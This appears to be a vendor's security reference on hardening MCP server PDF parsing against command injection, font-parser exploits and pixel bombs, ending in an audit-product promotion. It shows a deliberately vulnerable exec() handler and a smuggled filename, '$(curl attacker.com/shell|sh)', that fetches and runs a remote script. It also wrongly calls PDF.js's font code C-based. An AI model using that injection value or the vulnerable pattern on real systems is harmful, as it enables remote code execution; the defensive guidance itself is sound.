Security reference · PDF · Document parsing

MCP server PDF parsing security

MCP tool handlers that extract text or metadata from PDF files expose a document processing attack surface that is qualitatively different from web request handling. The three main attack classes are: ghostscript command injection — where a filename containing shell metacharacters executes arbitrary commands when passed to exec("gs ..."); PDF.js sandbox escape — where a crafted PDF triggers parser vulnerabilities in the font rendering engine, potentially achieving code execution in a Node.js context; and pixel-bomb DoS — where a PDF embeds a compressed image that decompresses to gigabytes of pixel data, exhausting memory in the rendering process. All three are exploitable when an LLM agent passes an attacker-controlled PDF URL or file path to a document-processing tool.

Attack 1: Ghostscript command injection via filename

MCP document servers that use Ghostscript for PDF-to-text conversion often shell out via exec() or spawn(). When the filename is not properly sanitized, it becomes a command injection vector.

// WRONG — filename from tool argument passed directly to exec
import { exec } from "child_process";
import { promisify } from "util";
const execAsync = promisify(exec);

server.tool("extract_pdf_text", { filePath: z.string() }, async ({ filePath }) => {
  // filePath = "/tmp/report$(curl attacker.com/shell|sh).pdf"
  const { stdout } = await execAsync(`gs -dBATCH -dNOPAUSE -sDEVICE=txtwrite -sOutputFile=- "${filePath}"`);
  return { content: [{ type: "text", text: stdout }] };
});

The classic bypass is embedding a command substitution in the filename: /tmp/report$(curl attacker.com/shell|sh).pdf. When the shell expands the double-quoted string, the $(…) subshell executes before Ghostscript runs. Even with path sanitization, characters like backticks, semicolons, and newlines in filenames can break shell quoting.

Safe pattern: use spawn with an argument array, never a shell string.

import { spawn } from "child_process";

async function ghostscriptExtract(filePath: string): Promise<string> {
  // Validate path is within allowed directory BEFORE passing to spawn
  const resolved = path.resolve(filePath);
  if (!resolved.startsWith(ALLOWED_PDF_DIR + path.sep)) {
    throw new Error("PDF path outside allowed directory");
  }

  return new Promise((resolve, reject) => {
    // spawn with array args — no shell expansion, no injection possible
    const gs = spawn("gs", [
      "-dBATCH", "-dNOPAUSE", "-dSAFER",   // -dSAFER restricts file access in gs
      "-sDEVICE=txtwrite",
      "-sOutputFile=-",
      resolved   // validated path as a separate argument, not part of a shell string
    ], { shell: false });  // shell: false is the default but explicit is safer

    let output = "";
    let error = "";
    gs.stdout.on("data", d => output += d);
    gs.stderr.on("data", d => error += d);
    gs.on("close", code => {
      if (code !== 0) reject(new Error(`gs exited ${code}: ${error}`));
      else resolve(output);
    });
  });
}

Ghostscript's -dSAFER flag also restricts the interpreter from reading or writing files outside the current directory — a second layer of defense against path traversal via Ghostscript's PostScript execution engine (which can itself perform file I/O via PostScript operators).

Attack 2: PDF.js parser exploitation via malicious fonts

PDF.js is the most common pure-JavaScript PDF parser for Node.js and is used by many MCP document tools as a ghostscript alternative. While it avoids shell execution, its C-based font rendering code (Type1, CFF, TrueType parsers) has historically been vulnerable to memory corruption when processing crafted font tables.

The exploit pattern: a PDF embeds a Type1 or CFF font with a crafted charstrings array. The parser reads beyond the end of the array, producing a heap read out of bounds. In native environments (browser PDF viewers), this can lead to code execution via JIT spray. In Node.js with PDF.js running in a Worker thread, V8 heap isolation limits the blast radius — the Worker crashes but the main process survives.

Never run PDF.js in the main process of an MCP server. Parse PDFs in a Worker thread with resourceLimits set. If the Worker crashes due to a font parser exploit, the main process — and all other concurrent sessions — remain alive.

import { Worker, isMainThread, parentPort, workerData } from "worker_threads";

// In the main thread handler:
server.tool("extract_pdf_text", { pdfBuffer: z.string() }, async ({ pdfBuffer }) => {
  const text = await new Promise<string>((resolve, reject) => {
    const worker = new Worker(__filename, {
      workerData: { pdfBuffer },
      resourceLimits: {
        maxOldGenerationSizeMb: 128,  // cap memory: limits pixel-bomb damage
        maxYoungGenerationSizeMb: 32,
      }
    });
    const timeout = setTimeout(() => {
      worker.terminate();
      reject(new Error("PDF parsing timeout"));
    }, 10_000);
    worker.on("message", result => {
      clearTimeout(timeout);
      if (result.error) reject(new Error(result.error));
      else resolve(result.text);
    });
    worker.on("error", err => { clearTimeout(timeout); reject(err); });
  });
  return { content: [{ type: "text", text }] };
});

// In the Worker thread:
if (!isMainThread) {
  import("pdfjs-dist/legacy/build/pdf.js").then(async ({ getDocument }) => {
    try {
      const buffer = Buffer.from(workerData.pdfBuffer, "base64");
      const doc = await getDocument({ data: buffer }).promise;
      const pages: string[] = [];
      for (let i = 1; i <= Math.min(doc.numPages, 100); i++) {  // cap at 100 pages
        const page = await doc.getPage(i);
        const content = await page.getTextContent();
        pages.push(content.items.map((item: any) => item.str).join(" "));
      }
      parentPort!.postMessage({ text: pages.join("\n\n") });
    } catch (err: any) {
      parentPort!.postMessage({ error: err.message });
    }
  });
}

Attack 3: Pixel-bomb DoS via embedded images

A PDF can embed raster images that decompress to enormous pixel buffers. A single 1-bit black-and-white image defined as 65535×65535 pixels (4.2 billion pixels) stored as CCITT compressed data weighs a few kilobytes in the PDF but requires over 4 GB of RAM when decompressed to an RGBA buffer. If the parser allocates that buffer, the process exhausts memory.

The resourceLimits.maxOldGenerationSizeMb cap on the Worker thread limits how much memory the parser can use before V8 triggers a heap out-of-memory error and kills the Worker. Set this before you ever call getDocument().

For servers using Ghostscript, limit maximum resolution of image rendering:

// Ghostscript with rasterization — limit DPI to prevent pixel-bomb
spawn("gs", [
  "-dBATCH", "-dNOPAUSE", "-dSAFER",
  "-r72",          // 72 DPI — limits pixel buffer size during rendering
  "-dMaxBitmap=50000000",  // 50 MB max bitmap in GS memory
  "-sDEVICE=txtwrite",
  "-sOutputFile=-",
  resolvedPath
], { shell: false });

Safe parsing library comparison

Library	Text extraction	Ghostscript dependency	Font parser risk	Recommendation
`pdf-lib`	No (creation only)	None	None	Use for PDF creation; not for extraction
`pdfjs-dist`	Yes	None	Low-Medium (pure JS, patched regularly)	Use in Worker thread with resourceLimits
`pdf-parse`	Yes (wraps pdfjs)	None	Depends on bundled pdfjs version	Pin version; run in Worker thread
Ghostscript via exec()	Yes	Yes (native binary)	High (C binary with long CVE history)	Use spawn() with array args and -dSAFER; sandbox process
LibreOffice headless	Yes (with macro risk)	No (own engine)	High (macro execution, OLE links)	See office document security reference; not recommended for PDFs

Additional safety checks

Validate MIME type before parsing. Check that the uploaded or fetched file is actually a PDF (magic bytes %PDF at offset 0) before passing to any parser. Reject files that claim to be PDFs but have a different magic number — an attacker might submit a ZIP bomb with a .pdf extension.

// Check PDF magic bytes before parsing
function isPDF(buffer: Buffer): boolean {
  return buffer.length >= 5 && buffer.slice(0, 5).toString("ascii") === "%PDF-";
}

if (!isPDF(fileBuffer)) {
  throw new Error("File is not a valid PDF");
}

Cap file size before downloading. Check Content-Length before reading the full response body — reject PDFs above your limit (e.g., 50 MB) without downloading them.

Limit page count. PDFs with thousands of pages can make text extraction take minutes. Cap at a reasonable page limit (100 pages) and return partial results with a note.

SkillAudit findings

Finding → Grade Impact

Critical Ghostscript invoked via exec() with unsanitized filename — shell command injection. −25 points.

Critical PDF parsing in main process with no Worker isolation — font parser exploit crashes entire MCP server. −20 points.

High No memory cap on PDF parser Worker thread — pixel-bomb can exhaust server memory. −12 points.

High No file size limit before PDF download or parsing. −10 points.

High Ghostscript invoked without -dSAFER — PostScript operators can access arbitrary filesystem paths. −10 points.

Medium No magic-byte MIME validation before PDF parsing. −5 points.

Medium No page count limit — attacker submits 10,000-page PDF causing multi-minute extraction. −5 points.

Run a PDF parsing security audit. SkillAudit checks for ghostscript exec() patterns, Worker thread isolation, resourceLimits configuration, and MIME validation in MCP document tool handlers. Audit your server →